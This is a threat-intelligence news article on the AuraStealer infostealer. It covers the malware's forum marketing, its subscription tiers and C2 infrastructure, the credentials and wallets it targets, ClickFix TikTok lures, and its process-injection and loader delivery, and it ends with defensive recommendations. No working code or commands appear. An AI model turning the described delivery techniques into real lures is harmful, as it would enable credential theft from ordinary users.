A new information-stealing malware, dubbed AuraStealer, has emerged as a significant threat in the cybersecurity landscape since mid-2025. Developed by Russian-speaking threat actors, AuraStealer first surfaced on underground hacking forums in July 2025. Its rapid deployment followed the disruption of the Lumma stealer infrastructure, a move that created a market vacuum quickly exploited by the AuraStealer operators. The malware offers a subscription-based service, a sophisticated management panel, and an expanding user base, positioning itself as a direct competitor to existing infostealers.
The initial promotional message for AuraStealer, authored by a user named “AuraCorp,” appeared on the XSS forum on July 8, 2025. This detailed post, written in Russian, outlined the malware’s extensive capabilities, featured screenshots of its management interface, and included a user agreement. Subsequent postings occurred on Exploit in August 2025, Darkmarket in November 2025, and several English-language forums such as Blackbones, Sinister, Enclave, and Darkstash in December 2025. This broad dissemination indicates a concerted effort to reach a wide range of cybercriminals.
AuraStealer’s Pervasive Capabilities and Infrastructure
The developers of AuraStealer claim their tool is the product of experienced professionals, capable of harvesting data from over 110 web browsers, more than 70 applications, and over 250 browser extensions. This broad scope suggests a design intended for widespread data compromise. Intrinsec analysts have identified AuraStealer as a rapidly evolving threat, supported by a robust command-and-control (C2) infrastructure. Their research uncovered 48 C2 domain names associated with AuraStealer operations, identified from over 200 samples analyzed on VirusTotal. The malware operators utilize inexpensive .SHOP and .CFD top-level domains, a common tactic among less affluent threat actors. To conceal the actual server locations, traffic is routed through Cloudflare, acting as a reverse proxy.
Intrinsec’s analysis also indicates a shift in the threat actor’s infrastructure, with a move from .SHOP to .CFD domains in more recent versions of the malware. This transition suggests an ongoing effort to adapt and maintain operational security. The management panel provided to AuraStealer buyers offers comprehensive tools for campaign management. These features include build generation, log filtering, geographical data dashboards, and integration with Telegram bots for real-time exfiltration of stolen information. The service is offered through two subscription tiers: a Basic package for $295 per month and an Advanced package for $585 per month.
The AuraStealer developer has reportedly indicated that users of Lumma, StealC, Vidar, and Rhadamanthys are migrating to their platform. Multiple active campaigns have already been confirmed in the wild, underscoring the immediate threat posed by this infostealer. The range of data AuraStealer is designed to capture is extensive. It includes browser credentials, cryptocurrency wallet data, two-factor authentication tokens, session cookies from popular platforms like Discord, Telegram, and Steam, VPN configuration files, password manager databases from applications such as KeePass and Bitwarden, clipboard contents, and screenshots of the victim’s screen.
Delivery Mechanisms and Recommendations for Defense
AuraStealer primarily disseminates through social engineering tactics, notably a technique referred to as ClickFix. Security researchers documented a campaign in October 2025 where malicious TikTok videos advertised as tutorials for activating popular software like Windows, Microsoft 365, Adobe Photoshop, and Spotify. These videos instructed victims to open PowerShell with administrator privileges and execute a command that silently downloaded and ran the AuraStealer payload without any visible alerts. This method exploits users’ desire for legitimate software.
In addition to TikTok lures, AuraStealer has been distributed using a variety of loaders and downloaders. Reports indicate that the malware has been injected into legitimate Windows processes, such as regasm.exe and SndVol.exe, through methods involving Visual Basic scripts, self-executing archives, and Donut shellcode loaders. In other instances, a loader known as “Soulbind” has been used to retrieve and execute the AuraStealer payload from remote servers. Furthermore, malicious .NET DLLs, DLL sideloading techniques, and a fake system cleaning utility named Gcleaner have also been observed in various distribution campaigns.
To mitigate the risks associated with AuraStealer, security teams should prioritize blocking PowerShell execution originating from social media content or unofficial software activation websites. Endpoint security solutions should be configured to detect and alert on process injection attempts into legitimate Windows system binaries. It is critical to block all 48 identified C2 domains associated with AuraStealer at the network perimeter without delay. Employee awareness training is paramount to equip users with the skills to identify ClickFix-style social engineering attacks, particularly those delivered via video platforms.
Restricting administrative access to PowerShell and implementing application allow-listing policies can significantly reduce the likelihood of an organization succumbing to such threats. The evolving nature of AuraStealer and its active campaigns necessitate continuous monitoring of threat intelligence and prompt implementation of defensive measures. The long-term outlook suggests that threat actors will likely continue to refine AuraStealer’s capabilities and delivery methods, making proactive security strategies essential.